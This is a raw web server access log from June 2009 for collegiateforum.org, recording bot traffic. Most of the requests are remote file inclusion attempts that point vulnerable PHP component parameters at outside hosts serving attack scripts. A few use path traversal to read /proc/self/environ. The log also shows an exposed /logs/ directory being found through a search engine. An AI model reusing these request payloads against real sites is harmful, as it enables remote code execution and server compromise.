66.197.183.69 - - [29/Jun/2009:02:11:32 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:02:11:33 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:02:11:35 -0700] "GET /logs/htmltonuke.php?filnavn=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:02:11:38 -0700] "GET /htmltonuke.php?filnavn=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
119.93.90.155 - - [29/Jun/2009:02:12:11 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:12:27 -0700] "GET /logs/access.log//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:12:27 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:12:27 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /logs/access_081208.log//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:17 -0700] "GET /logs//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:29 -0700] "GET /logs/access.log//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:29 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:13:29 -0700] "GET /logs//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:13:48 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:13:48 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:13:51 -0700] "GET /logs/access.log//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:08 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:08 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:09 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:11 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:11 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:20:12 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:02:20:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:10 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:10 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:11 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:11 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:11 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:12 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:23:50 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:24:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:24:06 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:24:07 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:24:13 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:24:13 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:24:13 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:24:36 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:24:36 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:24:36 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:24:44 -0700] "GET /logs/access.log%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:25:32 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:25:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:25:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:25:38 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:25:44 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:25:58 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:25:58 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:25:58 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:07 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:07 -0700] "GET /htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:07 -0700] "GET /logs/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:19 -0700] "GET /htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:19 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:26:22 -0700] "GET /logs/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:27:04 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:28:12 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:28:19 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:28:41 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:28:51 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:28:56 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:28:56 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:28:57 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:29:14 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:29:14 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:29:15 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:29:23 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
70.86.9.234 - - [29/Jun/2009:02:29:37 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:30:19 -0700] "GET /logs/access_081208.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:30:39 -0700] "GET /logs/access_081208.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:30:40 -0700] "GET /logs//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:30:40 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:31:31 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:31:36 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.126.234.22 - - [29/Jun/2009:02:33:04 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.google.ca/search?hl=en&q=%22index+of%22%2Flogs&btnG=Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.collegiateforum.org"
199.126.234.22 - - [29/Jun/2009:02:33:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.collegiateforum.org"
199.126.234.22 - - [29/Jun/2009:02:33:06 -0700] "GET /logs/access.log HTTP/1.1" 200 370103 "http://www.collegiateforum.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.collegiateforum.org"
199.126.234.22 - - [29/Jun/2009:02:33:07 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:34:27 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:34:27 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:34:27 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:34:37 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:34:37 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:34:37 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
88.84.128.40 - - [29/Jun/2009:02:35:44 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:35:53 -0700] "GET /logs/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:35:54 -0700] "GET /index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:35:54 -0700] "GET /logs/access_090105.log%20%20/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
65.55.106.121 - - [29/Jun/2009:02:35:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
72.30.65.31 - - [29/Jun/2009:02:35:57 -0700] "GET /Jonathan_Fantini_Porter/germany.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:36:09 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:02 -0700] "GET /logs//main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:02 -0700] "GET /main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:02 -0700] "GET /logs/access_090105.log%20%20//main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:37:10 -0700] "GET /logs/access_090105.log/index.php?menu=deti&page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:10 -0700] "GET /logs/access_090105.log%20%20//main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:10 -0700] "GET /main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
200.93.147.154 - - [29/Jun/2009:02:37:10 -0700] "GET /logs//main.php?_zb_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:40:36 -0700] "GET /logs/access_090330.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:40:36 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:40:36 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:02:43:01 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:02:43:01 -0700] "GET /htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:02:43:01 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:18 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:18 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:18 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:02:43:26 -0700] "GET /logs/access_081208.log%20%20/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
